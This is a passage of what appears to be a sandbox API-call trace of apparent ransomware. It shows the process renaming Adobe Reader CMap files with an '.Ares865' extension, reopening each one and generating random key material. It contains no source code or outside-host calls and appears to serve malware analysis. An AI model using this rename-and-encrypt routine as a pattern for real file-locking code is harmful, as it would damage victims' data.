10.0\\Resource\\CMap\\UniJIS-UCS2-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-h.ares865"), dwFlags=0x1) returned 1 [0162.769] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.769] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=177536) returned 1 [0162.769] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.770] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.770] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.785] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.786] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.786] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.788] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniJIS-UCS2-HW-H" | out: lpString1="UniJIS-UCS2-HW-H") returned="UniJIS-UCS2-HW-H" [0162.788] lstrlenW (lpString="UniJIS-UCS2-HW-H") returned 16 [0162.788] lstrlenW (lpString="Ares865") returned 7 [0162.788] lstrcmpiW (lpString1="S2-HW-H", lpString2="Ares865") returned 1 [0162.789] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-H.Ares865") returned 79 [0162.789] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-hw-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-hw-h.ares865"), dwFlags=0x1) returned 1 [0162.791] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-hw-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.791] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2970) returned 1 [0162.791] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.792] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.792] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.794] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.795] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.795] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.795] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniJIS-UCS2-HW-V" | out: lpString1="UniJIS-UCS2-HW-V") returned="UniJIS-UCS2-HW-V" [0162.795] lstrlenW (lpString="UniJIS-UCS2-HW-V") returned 16 [0162.795] lstrlenW (lpString="Ares865") returned 7 [0162.795] lstrcmpiW (lpString1="S2-HW-V", lpString2="Ares865") returned 1 [0162.796] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-V.Ares865") returned 79 [0162.796] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-hw-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-hw-v.ares865"), dwFlags=0x1) returned 1 [0162.797] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-hw-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.798] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6939) returned 1 [0162.798] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.799] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.799] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.802] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.803] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.803] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.804] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniJIS-UCS2-V" | out: lpString1="UniJIS-UCS2-V") returned="UniJIS-UCS2-V" [0162.804] lstrlenW (lpString="UniJIS-UCS2-V") returned 13 [0162.804] lstrlenW (lpString="Ares865") returned 7 [0162.804] lstrcmpiW (lpString1="-UCS2-V", lpString2="Ares865") returned 1 [0162.804] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-V.Ares865") returned 76 [0162.804] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-v.ares865"), dwFlags=0x1) returned 1 [0162.806] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.806] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6853) returned 1 [0162.806] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.807] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.807] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.816] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.816] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.816] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.817] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniJIS-UTF16-H" | out: lpString1="UniJIS-UTF16-H") returned="UniJIS-UTF16-H" [0162.817] lstrlenW (lpString="UniJIS-UTF16-H") returned 14 [0162.817] lstrlenW (lpString="Ares865") returned 7 [0162.817] lstrcmpiW (lpString1="UTF16-H", lpString2="Ares865") returned 1 [0162.817] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-H.Ares865") returned 77 [0162.817] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-utf16-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-utf16-h.ares865"), dwFlags=0x1) returned 1 [0162.821] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-utf16-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.821] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=202173) returned 1 [0162.821] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.822] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.822] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.840] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.840] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.840] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.843] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniJIS-UTF16-V" | out: lpString1="UniJIS-UTF16-V") returned="UniJIS-UTF16-V" [0162.843] lstrlenW (lpString="UniJIS-UTF16-V") returned 14 [0162.843] lstrlenW (lpString="Ares865") returned 7 [0162.843] lstrcmpiW (lpString1="UTF16-V", lpString2="Ares865") returned 1 [0162.844] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-V.Ares865") returned 77 [0162.844] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-utf16-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-utf16-v.ares865"), dwFlags=0x1) returned 1 [0162.846] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-utf16-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.846] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6061) returned 1 [0162.846] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.847] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.847] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.849] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.850] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.850] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.850] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniJIS2004-UTF16-H" | out: lpString1="UniJIS2004-UTF16-H") returned="UniJIS2004-UTF16-H" [0162.850] lstrlenW (lpString="UniJIS2004-UTF16-H") returned 18 [0162.850] lstrlenW (lpString="Ares865") returned 7 [0162.850] lstrcmpiW (lpString1="UTF16-H", lpString2="Ares865") returned 1 [0162.851] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-H.Ares865") returned 81 [0162.851] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis2004-utf16-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis2004-utf16-h.ares865"), dwFlags=0x1) returned 1 [0162.852] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis2004-utf16-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.852] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=202256) returned 1 [0162.853] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.853] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.853] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.883] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.884] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.884] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.887] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniJIS2004-UTF16-V" | out: lpString1="UniJIS2004-UTF16-V") returned="UniJIS2004-UTF16-V" [0162.887] lstrlenW (lpString="UniJIS2004-UTF16-V") returned 18 [0162.887] lstrlenW (lpString="Ares865") returned 7 [0162.888] lstrcmpiW (lpString1="UTF16-V", lpString2="Ares865") returned 1 [0162.888] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-V.Ares865") returned 81 [0162.888] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis2004-utf16-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis2004-utf16-v.ares865"), dwFlags=0x1) returned 1 [0162.891] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS2004-UTF16-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis2004-utf16-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.891] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6085) returned 1 [0162.892] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.892] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.892] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.895] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.896] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.896] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.896] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniKS-UCS2-H" | out: lpString1="UniKS-UCS2-H") returned="UniKS-UCS2-H" [0162.896] lstrlenW (lpString="UniKS-UCS2-H") returned 12 [0162.896] lstrlenW (lpString="Ares865") returned 7 [0162.896] lstrcmpiW (lpString1="-UCS2-H", lpString2="Ares865") returned 1 [0162.896] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-H.Ares865") returned 75 [0162.897] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-ucs2-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-ucs2-h.ares865"), dwFlags=0x1) returned 1 [0162.899] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-ucs2-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.899] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174803) returned 1 [0162.899] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.900] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.900] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.932] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.932] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.932] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.935] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniKS-UCS2-V" | out: lpString1="UniKS-UCS2-V") returned="UniKS-UCS2-V" [0162.935] lstrlenW (lpString="UniKS-UCS2-V") returned 12 [0162.935] lstrlenW (lpString="Ares865") returned 7 [0162.935] lstrcmpiW (lpString1="-UCS2-V", lpString2="Ares865") returned 1 [0162.935] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-V.Ares865") returned 75 [0162.935] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-ucs2-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-ucs2-v.ares865"), dwFlags=0x1) returned 1 [0162.938] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-ucs2-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.938] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3240) returned 1 [0162.938] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.939] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.939] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.941] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.941] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.941] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.942] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniKS-UTF16-H" | out: lpString1="UniKS-UTF16-H") returned="UniKS-UTF16-H" [0162.942] lstrlenW (lpString="UniKS-UTF16-H") returned 13 [0162.942] lstrlenW (lpString="Ares865") returned 7 [0162.942] lstrcmpiW (lpString1="UTF16-H", lpString2="Ares865") returned 1 [0162.942] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-H.Ares865") returned 76 [0162.942] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-utf16-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-utf16-h.ares865"), dwFlags=0x1) returned 1 [0162.944] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-utf16-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.944] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=131866) returned 1 [0162.944] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.945] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.945] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.953] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.954] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.954] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.956] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniKS-UTF16-V" | out: lpString1="UniKS-UTF16-V") returned="UniKS-UTF16-V" [0162.956] lstrlenW (lpString="UniKS-UTF16-V") returned 13 [0162.956] lstrlenW (lpString="Ares865") returned 7 [0162.956] lstrcmpiW (lpString1="UTF16-V", lpString2="Ares865") returned 1 [0162.956] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-V.Ares865") returned 76 [0162.956] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-utf16-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-utf16-v.ares865"), dwFlags=0x1) returned 1 [0162.959] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-utf16-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.959] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3198) returned 1 [0162.959] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.960] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.960] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.962] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.963] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 